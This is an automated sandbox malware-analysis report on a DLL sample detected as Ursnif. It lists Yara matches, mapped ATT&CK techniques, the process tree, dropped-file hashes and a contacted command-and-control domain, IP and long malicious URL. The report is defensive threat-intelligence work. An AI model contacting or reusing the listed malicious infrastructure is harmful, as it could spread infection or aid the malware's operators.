            Yara detected Ursnif
            Source: Yara match; File source: 00000004.00000003.430352092.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000002.464198146.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000003.430424986.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000003.430241635.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000003.430313705.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000003.430450163.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000003.430406711.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000003.430285928.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000003.430372927.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match; File source: Process Memory Space: rundll32.exe PID: 5328, type: MEMORY

            Remote Access Functionality:

            Yara detected Ursnif
            Source: Yara match; File source: 00000004.00000003.430352092.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000002.464198146.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000003.430424986.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000003.430241635.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000003.430313705.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000003.430450163.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000003.430406711.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000003.430285928.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000003.430372927.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match; File source: Process Memory Space: rundll32.exe PID: 5328, type: MEMORY

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Windows Management Instrumentation (1) | Path Interception | Process Injection (12) | Masquerading (1) | Input Capture (1) | System Time Discovery (1) | Remote Services | Input Capture (1) | Exfiltration Over Other Network Medium | Encrypted Channel (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | Native API (1) | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection (12) | LSASS Memory | Query Registry (1) | Remote Desktop Protocol | Archive Collected Data (1) | Exfiltration Over Bluetooth | Ingress Tool Transfer (3) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information (1) | Security Account Manager | Security Software Discovery (3) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol (3) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information (2) | NTDS | Process Discovery (1) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (3) | SIM Card Swap | | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Rundll32 (1) | LSA Secrets | File and Directory Discovery (1) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery (24) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
            (Numbers in parentheses are the count of matched signatures for that technique.)

            Behavior Graph

            Behavior Graph ID: 432910; Sample: SecuriteInfo.com..7135.20767; Start date: 10/06/2021; Architecture: WINDOWS; Score: 76
            Signatures on the root node: Multi AV Scanner detection for domain / URL; Found malware configuration; Antivirus detection for URL or domain; Yara detected Ursnif
            Process nodes: loaddll32.exe and iexplore.exe started from the root; rundll32.exe, cmd.exe and a second rundll32.exe started by loaddll32.exe (signature on the first rundll32.exe: Writes registry values via WMI); a third rundll32.exe started by cmd.exe; a second iexplore.exe started by the first iexplore.exe
            Network node: authd.feronok.com (185.233.80.31, ports 49748, 49749, 80; SUPERSERVERSDATACENTERRU, Russian Federation), contacted by the second iexplore.exe


            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            Source | Detection | Scanner | Label
            SecuriteInfo.com..7135.dll | 4% | Virustotal |
            SecuriteInfo.com..7135.dll | 4% | ReversingLabs |

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            Source | Detection | Scanner | Label
            5.2.rundll32.exe.4540000.1.unpack | 100% | Avira | HEUR/AGEN.1108168
            4.2.rundll32.exe.3190000.1.unpack | 100% | Avira | HEUR/AGEN.1108168

            Domains

            Source | Detection | Scanner | Label
            authd.feronok.com | 11% | Virustotal |

            URLs

            Source | Detection | Scanner | Label
            http://authd.feronok.com/INsgiuDpuLw85PPWCNwmsmw/LyIcaMF9BW/RDuesN3193oziv6jZ/21yngUSJZxlB/5U99_2BFq | 100% | Avira URL Cloud | malware
            http://authd.feronok.com/INsgiuDpuLw85PPWCNwmsmw/LyIcaMF9BW/RDuesN3193oziv6jZ/21yngUSJZxlB/5U99_2BFq39/C9yL3XEqjGdzvV/F4wrCEliEtubK_2BQN3v0/mpD0sYBWj1_2BOoZ/MhYNZMroasOcyRm/Y7cgiiYGTmIYClS1bt/R_2BrGpes/V0WKbm6yczDyoBvOW06Z/_2FVUJ_2BtBEMJQ2mZ0/eqMRxCIXxJwUIjVA7qTLlE/f_2FwC5tmUPbh/r76jmp6x/obp7g2x_2BpjxmD9q5fMhKl/Y1cOMUM_2F/x9ahGBENuH7csdR7_/2FySnpeWZizz/XD203nXIqoX/COsoX4qlT56/jcBfJkpo | 100% | Avira URL Cloud | malware

            Domains and IPs

            Contacted Domains

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            authd.feronok.com | 185.233.80.31 | true | true | | unknown

            Contacted URLs

            Name | Malicious | Antivirus Detection | Reputation
            http://authd.feronok.com/INsgiuDpuLw85PPWCNwmsmw/LyIcaMF9BW/RDuesN3193oziv6jZ/21yngUSJZxlB/5U99_2BFq39/C9yL3XEqjGdzvV/F4wrCEliEtubK_2BQN3v0/mpD0sYBWj1_2BOoZ/MhYNZMroasOcyRm/Y7cgiiYGTmIYClS1bt/R_2BrGpes/V0WKbm6yczDyoBvOW06Z/_2FVUJ_2BtBEMJQ2mZ0/eqMRxCIXxJwUIjVA7qTLlE/f_2FwC5tmUPbh/r76jmp6x/obp7g2x_2BpjxmD9q5fMhKl/Y1cOMUM_2F/x9ahGBENuH7csdR7_/2FySnpeWZizz/XD203nXIqoX/COsoX4qlT56/jcBfJkpo | true | Avira URL Cloud: malware | unknown

            URLs from Memory and Binaries

            Name | Source | Malicious | Antivirus Detection | Reputation
            http://authd.feronok.com/INsgiuDpuLw85PPWCNwmsmw/LyIcaMF9BW/RDuesN3193oziv6jZ/21yngUSJZxlB/5U99_2BFq | {FA4B99A6-CA78-11EB-90E4-ECF4BB862DED}.dat.23.dr, ~DF80E1CCC67DA5CD93.TMP.23.dr | true | Avira URL Cloud: malware | unknown

            Contacted IPs


            Public

            IP | Domain | Country | ASN | ASN Name | Malicious
            185.233.80.31 | authd.feronok.com | Russian Federation | 50113 | SUPERSERVERSDATACENTERRU | true

            General Information

            Joe Sandbox Version: 32.0.0 Black Diamond
            Analysis ID: 432910
            Start date: 10.06.2021
            Start time: 22:48:16
            Joe Sandbox Product: CloudBasic
            Overall analysis duration: 0h 6m 35s
            Hypervisor based Inspection enabled: false
            Report type: full
            Sample file name: SecuriteInfo.com..7135.20767 (renamed file extension from 20767 to dll)
            Cookbook file name: default.jbs
            Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of new started processes analysed: 27
            Number of new started drivers analysed: 0
            Number of existing processes analysed: 0
            Number of existing drivers analysed: 0
            Number of injected processes analysed: 0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode: default
            Analysis stop reason: Timeout
            Detection: MAL
            Classification: mal76.troj.winDLL@12/13@1/1
            EGA Information: Failed
            HDC Information:
            • Successful, ratio: 4.7% (good quality ratio 4.5%)
            • Quality average: 79.6%
            • Quality standard deviation: 28.5%
            HCA Information:
            • Successful, ratio: 71%
            • Number of executed functions: 26
            • Number of non-executed functions: 43
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            Warnings:
            • Excluded processes from analysis (whitelisted): taskhostw.exe, audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe, svchost.exe, UsoClient.exe
            • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 104.43.193.48, 13.88.21.125, 23.57.80.111, 205.185.216.10, 205.185.216.42, 51.103.5.159, 40.126.31.143, 40.126.31.6, 40.126.31.4, 20.190.159.132, 20.190.159.136, 40.126.31.135, 40.126.31.8, 40.126.31.139, 20.50.102.62, 20.54.26.129, 20.82.210.154, 92.122.213.247, 92.122.213.194, 88.221.62.148
            • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, wns.notify.trafficmanager.net, go.microsoft.com, login.live.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, www.tm.a.prd.aadg.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, login.msa.msidentity.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus15.cloudapp.net, www.tm.lg.prod.aadmsa.trafficmanager.net
            • Not all processes were analyzed; the report is missing behavior information.
            • Report size getting too big; too many NtOpenKeyEx calls found.

            Simulations

            Behavior and APIs

            Time | Type | Description
            22:50:25 | API Interceptor | 1x Sleep call for process: rundll32.exe modified

            Joe Sandbox View / Context

            IPs

            No context

            Domains

            Match: authd.feronok.com
            Associated Sample Name / URL | Detection | Context (IP)
            HP7cjYBnlS.dll | malicious | 47.254.173.212
            1.dll | malicious | 34.95.62.189
            racial.dll | malicious | 35.199.86.111
            racial.dll | malicious | 35.199.86.111
            racial.dll | malicious | 35.199.86.111
            racial.dll | malicious | 35.199.86.111
            racial.dll | malicious | 35.199.86.111
            racial.dll | malicious | 35.199.86.111
            info_71411.vbs | malicious | 35.199.86.111
            racial.dll | malicious | 35.199.86.111
            racial.dll | malicious | 35.199.86.111
            soft.dll | malicious | 35.199.86.111
            racial.dll | malicious | 35.199.86.111
            racial.dll | malicious | 35.199.86.111
            Know.dll | malicious | 35.199.86.111

            ASN

            Match: SUPERSERVERSDATACENTERRU
            Associated Sample Name / URL | Detection | Context (IP)
            2 - #U041c#U0412#U0421 #U0423#U041a#U0420#U0410#U0407#U041d#U0418 - signed - (8uy).cpl | malicious | 46.17.104.120
            2 - #U041c#U0412#U0421 #U0423#U041a#U0420#U0410#U0407#U041d#U0418 - signed - (8uy).cpl | malicious | 46.17.104.120
            8s5P8pdch5.exe | malicious | 185.233.81.8
            0CUmIGFwMf.exe | malicious | 185.232.170.88
            y1e1FV1UWs.exe | malicious | 185.232.170.88
            091WJ1BnKf.exe | malicious | 45.144.64.230
            svchost10.exe | malicious | 45.144.65.97
            index.exe | malicious | 185.232.170.29
            NATO_042021-1re4.doc | malicious | 185.232.170.29
            8UOSzpl9E1.exe | malicious | 185.180.231.94
            UWbkgpAQuS.exe | malicious | 147.78.67.95
            9MyoOYNXKe.exe | malicious | 185.195.27.245
            LJiW5jWnuA.exe | malicious | 147.78.67.95
            tFqfAPK60I.exe | malicious | 147.78.67.95
            svchost.exe | malicious | 45.144.65.97
            m2.exe | malicious | 45.144.64.88
            2.exe | malicious | 45.144.64.88
            m4.exe | malicious | 45.144.64.88
            4.exe | malicious | 45.144.64.88
            YoOr2QDrm0.exe | malicious | 185.255.132.7

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{FA4B99A4-CA78-11EB-90E4-ECF4BB862DED}.dat
            Process: C:\Program Files\internet explorer\iexplore.exe
            File Type: Microsoft Word Document
            Category: dropped
            Size (bytes): 29272
            Entropy (8bit): 1.7724986024352953
            Encrypted: false
            SSDEEP: 384:rQt0h0zs0zNa0zNIy0zNIul0zNaMuXr0zuaMuB:Dm
            MD5: BB2CC967C3C6EDA44A69083EB767C117
            SHA1: DAC9F7F3B92917522249C29E661CF7ACF78847C2
            SHA-256: 88AB7F2C9FAD173136BD458EB3523BCED520C008EC9208F4D665934C16BEED5C
            SHA-512: BFF393D1FF52DB8EB802AB96DB705CC3D05026156EEC92801C6697D1B383E8C051F85E313BD60EA73782CD1A63D1E7CE356E986C60CBA5C44C633E148EFC161A
            Malicious: false
            Reputation: low
            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{FA4B99A6-CA78-11EB-90E4-ECF4BB862DED}.dat
            Process: C:\Program Files\internet explorer\iexplore.exe
            File Type: Microsoft Word Document
            Category: dropped
            Size (bytes): 28148
            Entropy (8bit): 1.924668728375893
            Encrypted: false
            SSDEEP: 192:rVZ6Qe64kHjx25W6MOFL7fj4vd1L75Q7fje7MA:rb3pFDgo7SLjSHLyjAn
            MD5: 14655AB8FC1D47B0C5998041E1946C6F
            SHA1: BF8356158D90869DE775D3EBAC100BD449C872E9
            SHA-256: 4C387E86AA95C86898A353AAAF18A2E2BF0CA0A6F686641D280D5032A840DEFB
            SHA-512: 078C5676E57A790B2BEC74462AFF7BECCEECB6C659F8BD6272D5A49C63DB56C335732DBC10E8210260CD09AD9C8CC7E839E36B2E5A0BEE4881BF4293701B439F
            Malicious: false
            Reputation: low
            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\down[1]
            Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
            File Type: PNG image data, 15 x 15, 8-bit colormap, non-interlaced
            Category: downloaded
            Size (bytes): 748
            Entropy (8bit): 7.249606135668305
            Encrypted: false
            SSDEEP: 12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
            MD5: C4F558C4C8B56858F15C09037CD6625A
            SHA1: EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
            SHA-256: 39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
            SHA-512: D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
            Malicious: false
            Reputation: high, very likely benign file
            IE Cache URL: res://ieframe.dll/down.png
            Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\errorPageStrings[1]
            Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
            File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
            Category: downloaded
            Size (bytes): 4720
            Entropy (8bit): 5.164796203267696
            Encrypted: false
            SSDEEP: 96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
            MD5: D65EC06F21C379C87040B83CC1ABAC6B
            SHA1: 208D0A0BB775661758394BE7E4AFB18357E46C8B
            SHA-256: A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
            SHA-512: 8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
            Malicious: false
            Reputation: high, very likely benign file
            IE Cache URL: res://ieframe.dll/errorPageStrings.js
            Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\ErrorPageTemplate[1]
            Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
            File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
            Category: downloaded
            Size (bytes): 2168
            Entropy (8bit): 5.207912016937144
            Encrypted: false
            SSDEEP: 24:5+j5xU5k5N0ndgvoyeP0yyiyQCDr3nowMVworDtX3orKxWxDnCMA0da+hieyuSQK:5Q5K5k5pvFehWrrarrZIrHd3FIQfOS6
            MD5: F4FE1CB77E758E1BA56B8A8EC20417C5
            SHA1: F4EDA06901EDB98633A686B11D02F4925F827BF0
            SHA-256: 8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
            SHA-512: 62514AB345B6648C5442200A8E9530DFB88A0355E262069E0A694289C39A4A1C06C6143E5961074BFAC219949102A416C09733F24E8468984B96843DC222B436
            Malicious: false
            Reputation: high, very likely benign file
            IE Cache URL: res://ieframe.dll/ErrorPageTemplate.css
            Preview: .body..{...font-family: "Segoe UI", "verdana", "arial";...background-image: url(background_gradient.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;...color: #575757;..}....body.securityError..{...font-family: "Segoe UI", "verdana" , "Arial";...background-image: url(background_gradient_red.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;..}....body.tabInfo..{...background-image: none;...background-color: #F4F4F4;..}.. ..a..{...color: rgb(19,112,171);.font-size: 1em;...font-weight: normal;...text-decoration: none;...margin-left: 0px;...vertical-align: top;..}....a:link, a:visited..{...color: rgb(19,112,171);...text-decoration: none;...vertical-align: top;..}....a:hover..{...color: rgb(7,74,229);...text-decoration: underline;..}....p..{...font-size: 0.9em;..}.....h1 /* used for Title */..{...color: #4465A2;...font-size: 1.1em;...font-weight: normal;...vertical-align
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\bullet[1]
            Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
            File Type: PNG image data, 15 x 15, 8-bit colormap, non-interlaced
            Category: downloaded
            Size (bytes): 447
            Entropy (8bit): 7.304718288205936
            Encrypted: false
            SSDEEP: 12:6v/71Cyt/JNTWxGdr+kZDWO7+4dKIv0b1GKuxu+R:/yBJNTqsSk9BTwE05su+R
            MD5: 26F971D87CA00E23BD2D064524AEF838
            SHA1: 7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
            SHA-256: 1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
            SHA-512: C62EB51BE301BB96C80539D66A73CD17CA2021D5D816233853A37DB72E04050271E581CC99652F3D8469B390003CA6C62DAD2A9D57164C620B7777AE99AA1B15
            Malicious: false
            IE Cache URL: res://ieframe.dll/bullet.png
            Preview: .PNG........IHDR...............ex....PLTE...(EkFRp&@e&@e)Af)AgANjBNjDNjDNj2Vv-Xz-Y{3XyC\}E_.2j.3l.8p.7q.;j.;l.Zj.\l.5o.7q.<..aw.<..dz.E...........1..@.7..~.....9..:.....A..B..E..9..:..a..c..b..g.#M.%O.#r.#s.%y.2..4..+..-..?..@..;..p..s...G..H..M.........z`....#tRNS................................../,....mIDATx^..C..`.......S....y'...05...|..k.X......*`.F.K....JQ..u.<.}.. ..[U..m....'r%.......yn.`.7F..).5..b..rX.T.....IEND.B`.
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\background_gradient[1]
            Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
            File Type: JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3
            Category: downloaded
            Size (bytes): 453
            Entropy (8bit): 5.019973044227213
            Encrypted: false
            SSDEEP: 6:3llVuiPjlXJYhg5suRd8PImMo23C/kHrJ8yA/NIeYoWg78C/vTFvbKLAh3:V/XPYhiPRd8j7+9LoIrobtHTdbKi
            MD5: 20F0110ED5E4E0D5384A496E4880139B
            SHA1: 51F5FC61D8BF19100DF0F8AADAA57FCD9C086255
            SHA-256: 1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
            SHA-512: 5F52C117E346111D99D3B642926139178A80B9EC03147C00E27F07AAB47FE38E9319FE983444F3E0E36DEF1E86DD7C56C25E44B14EFDC3F13B45EDEDA064DB5A
            Malicious: false
            IE Cache URL: res://ieframe.dll/background_gradient.jpg
            Preview: ......JFIF.....d.d......Ducky.......P......Adobe.d................................................................................................................................................. ...............W..............................................................Qa.................................?......%.....x......s...Z.......j.T.wz.6...X.@... V.3tM...P@.u.%...m..D.25...T...F.........p......A..........BP..qD.(.........ntH.@......h?..
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\httpErrorPagesScripts[1]
            Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
            File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
            Category: downloaded
            Size (bytes): 12105
            Entropy (8bit): 5.451485481468043
            Encrypted: false
            SSDEEP: 192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
            MD5: 9234071287E637F85D721463C488704C
            SHA1: CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
            SHA-256: 65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
            SHA-512: 87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
            Malicious: false
            IE Cache URL: res://ieframe.dll/httpErrorPagesScripts.js
            Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\http_404[1]
            Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
            File Type: HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
            Category: downloaded
            Size (bytes): 6495
            Entropy (8bit): 3.8998802417135856
            Encrypted: false
            SSDEEP: 48:up4d0yV4VkBXvLutC5N9J/1a5TI7kZ3GUXn3GFa7K083GJehBu01kptk7KwyBwpM:uKp6yN9JaKktZX36a7x05hwW7RM
            MD5: F65C729DC2D457B7A1093813F1253192
            SHA1: 5006C9B50108CF582BE308411B157574E5A893FC
            SHA-256: B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
            SHA-512: 717AFF18F105F342103D36270D642CC17BD9921FF0DBC87E3E3C2D897F490F4ECFAB29CF998D6D99C4951C3EABB356FE759C3483A33704CE9FCC1F546EBCBBC7
            Malicious: false
            IE Cache URL: res://ieframe.dll/http_404.htm
            Preview: .<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">....<html dir="ltr">.... <head>.. <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css">.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.... <title>HTTP 404 Not Found</title>.... <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:initHomepage(); expandCollapse('infoBlockID', true); initGoBack(); initMoreInfo('infoBlockID');">.... <table width="730" cellpadding="0" cellspacing="0" border="0">.... Error title -->.. <tr>.. <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">.. <img src="info_48.png" id="infoIcon" alt="Info icon">..
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\info_48[1]
            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
            File Type:PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced
            Category:downloaded
            Size (bytes):4113
            Entropy (8bit):7.9370830126943375
            Encrypted:false
            SSDEEP:96:WNTJL8szf79M8FUjE39KJoUUuJPnvmKacs6Uq7qDMj1XPL:WNrzFoQSJPnvzs6rL
            MD5:5565250FCC163AA3A79F0B746416CE69
            SHA1:B97CC66471FCDEE07D0EE36C7FB03F342C231F8F
            SHA-256:51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
            SHA-512:E60EA153B0FECE4D311769391D3B763B14B9A140105A36A13DAD23C2906735EAAB9092236DEB8C68EF078E8864D6E288BEF7EF1731C1E9F1AD9B0170B95AC134
            Malicious:false
            IE Cache URL:res://ieframe.dll/info_48.png
            C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):89
            Entropy (8bit):4.357175050784355
            Encrypted:false
            SSDEEP:3:oVXUbUvXkIi8JOGXnEbUvXkINLun:o9UwvXkBqEwvXkB
            MD5:178A01ED015C601590BBEC374F63BA4E
            SHA1:60027051467C6F595B05EE96B3F462A5347A1386
            SHA-256:008E01001F033E85A43FB4222C9D49A536730F53E20CA5B6000FF2208C7EB11C
            SHA-512:18190A74EFB6054F400B89B40F692A27D1D2367631EE8BA6043A6A1D7B306EDF6F47F8EC16E9A96C278885F4EF08487FAB28323A86FF5A06857BF93034C91E7A
            Malicious:false
            Preview: [2021/06/10 22:50:53.017] Latest deploy version: ..[2021/06/10 22:50:53.017] 11.211.2 ..
            C:\Users\user\AppData\Local\Temp\~DF00D3A9B95DF089AC.TMP
            Process:C:\Program Files\internet explorer\iexplore.exe
            File Type:data
            Category:dropped
            Size (bytes):12933
            Entropy (8bit):0.4112137916224424
            Encrypted:false
            SSDEEP:24:c9lLh9lLh9lIn9lIn9lo0/VF9lo0/P9lW0/b/l/cX/m/l/cp/k/o:kBqoI0I020zNkXuNkpMA
